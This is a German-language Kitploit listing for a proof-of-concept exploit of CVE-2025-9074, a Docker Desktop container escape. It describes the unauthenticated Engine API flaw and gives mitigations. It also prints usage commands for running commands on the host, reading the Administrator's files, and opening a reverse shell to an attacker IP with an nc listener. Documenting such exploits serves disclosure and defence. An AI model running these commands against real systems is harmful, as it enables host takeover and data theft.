Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-9074-Docker-Desktop-Container-Escape — Proof-of-Concept-Exploit für CVE-2025-9074 – Nicht authentifizierter Docker Engine API Container Escape, der Docker Desktop < 4.44.3 unter Windows und macOS betrifft (CVSS 9.3) | Kitploit
Tools/GitHubGitHub/ptechamanja/cve-2025-9074-docker-desktop-container-escape
Container-SicherheitSchwachstellenanalyseExploitationPenetrationstestsCloud-SicherheitRed TeamingContainer-Ausbruch
GitHubptechamanja/cve-2025-9074-docker-desktop-container-escape

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-9074-Docker-Desktop-Container-Escape

Proof-of-Concept-Exploit für CVE-2025-9074 – Nicht authentifizierter Docker Engine API Container Escape, der Docker Desktop < 4.44.3 unter Windows und macOS betrifft (CVSS 9.3)

Repository anzeigen
2vor 8 MonatenNoch nicht geprüft

CVE-2025-9074: Docker Desktop Container Escape PoC

CVE CVSS Platform

Proof-of-Concept-Exploit für CVE-2025-9074 – eine kritische Container-Escape-Sicherheitslücke in Docker Desktop, die unauthentifizierten Zugriff auf die Docker Engine API ermöglicht.

Sicherheitslückenübersicht

EigenschaftWert
CVE-IDCVE-2025-9074
CVSS-Score9.3 (Kritisch)
Betroffene SoftwareDocker Desktop < 4.44.3
Betroffene PlattformenWindows, macOS (Linux NICHT betroffen)
Behobene VersionDocker Desktop 4.44.3+
EntdeckerFelix Boulet, Philippe Dugré
EntdeckungsdatumMitte 2025
Patch-Datum20. August 2025

Technische Details

Die Sicherheitslücke ermöglicht es Containern, die auf Docker Desktop ausgeführt werden, auf die Docker Engine API unter http://192.168.65.7:2375 ohne Authentifizierung zuzugreifen. Dies tritt unabhängig von folgenden Einstellungen auf:

  • Enhanced Container Isolation (ECI)-Einstellungen
  • Konfiguration „Expose daemon on tcp://localhost:2375 without TLS“
  • Alle anderen Sicherheitseinstellungen

Auswirkungen

  • Windows (WSL-Backend): Vollständige Übernahme des Hosts mit Administrationsrechten
  • macOS: Manipulation von Containern und potenzielle Hintertür (eingeschränkt durch Benutzerabfragen)
  • Linux: Nicht betroffen (verwendet Unix-Socket anstelle von TCP)

Ursache

Die Docker Engine API wurde über einen TCP-Socket bereitgestellt, der von Containern aus zugänglich war, was Folgendes ermöglichte:

  • Erstellen/Löschen von Containern
  • Einhängen von Host-Dateisystemen
  • Ausführen privilegierter Befehle
  • Vollständige Umgehung der Container-Isolation

Verwendung

Bild

Voraussetzungen

root@kitploit:~
pip3 install requests

Befehlsausführungsmodus

root@kitploit:~
# Einen Befehl auf dem Host ausführen
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "whoami"

# Dateien von Windows-Host lesen
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "cat /hostfs/mnt/c/Users/Administrator/Desktop/root.txt"

# Benutzer unter Windows auflisten
python3 exploit.py -u http://192.168.65.7:2375 -m cmd -c "ls -la /hostfs/mnt/c/Users"

Reverse-Shell-Modus

root@kitploit:~
# Terminal 1: Listener einrichten
nc -lvnp 4444

# Terminal 2: Exploit ausführen
python3 exploit.py -u http://192.168.65.7:2375 -m reverse -l <YOUR_IP> -p 4444

# Nach erfolgreicher Verbindung befindet sich das Host-Dateisystem unter: /hostfs

Von innerhalb eines Containers

root@kitploit:~
# Wenn Sie bereits Zugriff auf einen Container haben
curl http://192.168.65.7:2375/version

Angriffsszenario

root@kitploit:~
graph TD
    A[Bösartiger Container] -->|Keine Authentifizierung erforderlich| B[Docker Engine API<br/>192.168.65.7:2375]
    B -->|Container erstellen| C[Privilegierter Container]
    C -->|Host-Dateisystem einhängen| D[Vollständiger Host-Zugriff]
    D -->|Lesen/Schreiben| E[System kompromittieren]

Abhilfemaßnahmen

Sofort erforderliche Maßnahme

Aktualisieren Sie sofort auf Docker Desktop 4.44.3 oder höher.

root@kitploit:~
# Überprüfen Sie Ihre Docker Desktop-Version
docker --version

# Docker Desktop aktualisieren
# Windows: Herunterladen von https://desktop.docker.com/win/main/amd64/Docker%20Desktop%20Installer.exe
# macOS: Herunterladen von https://desktop.docker.com/mac/main/amd64/Docker.dmg

Notfalllösungen (temporär)

Falls eine sofortige Aktualisierung nicht möglich ist:

  1. Vermeiden Sie die Ausführung nicht vertrauenswürdiger Container
  2. Überwachen Sie Netzwerkverbindungen von Containern
  3. Implementieren Sie Netzwerksegmentierung
  4. Überprüfen Sie alle Container-Images vor der Bereitstellung

Referenzen

  • Docker-Sicherheitshinweis
  • NVD CVE-2025-9074
  • Felix Boulets Blog
  • Philippe Dugrés Analyse
  • GitHub-Sicherheitshinweis

Haftungsausschluss

Dieses Tool wird ausschließlich zu Ausbildungs- und autorisierten Sicherheitstestzwecken bereitgestellt.

  • Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für deren Test Sie die ausdrückliche Erlaubnis haben.
  • Unbefugter Zugriff auf Computersysteme ist illegal.
  • Die Autoren übernehmen keine Haftung für Missbrauch dieser Software.

Danksagungen

  • Entdeckung der Sicherheitslücke: Felix Boulet, Philippe Dugré
  • Entwicklung des PoC: Amanja Francisco
  • Docker-Sicherheitsteam: Für schnelle Reaktion und Patch

Lizenz

MIT-Lizenz – Einzelheiten finden Sie in der LICENSE-Datei.

Tool herunterladen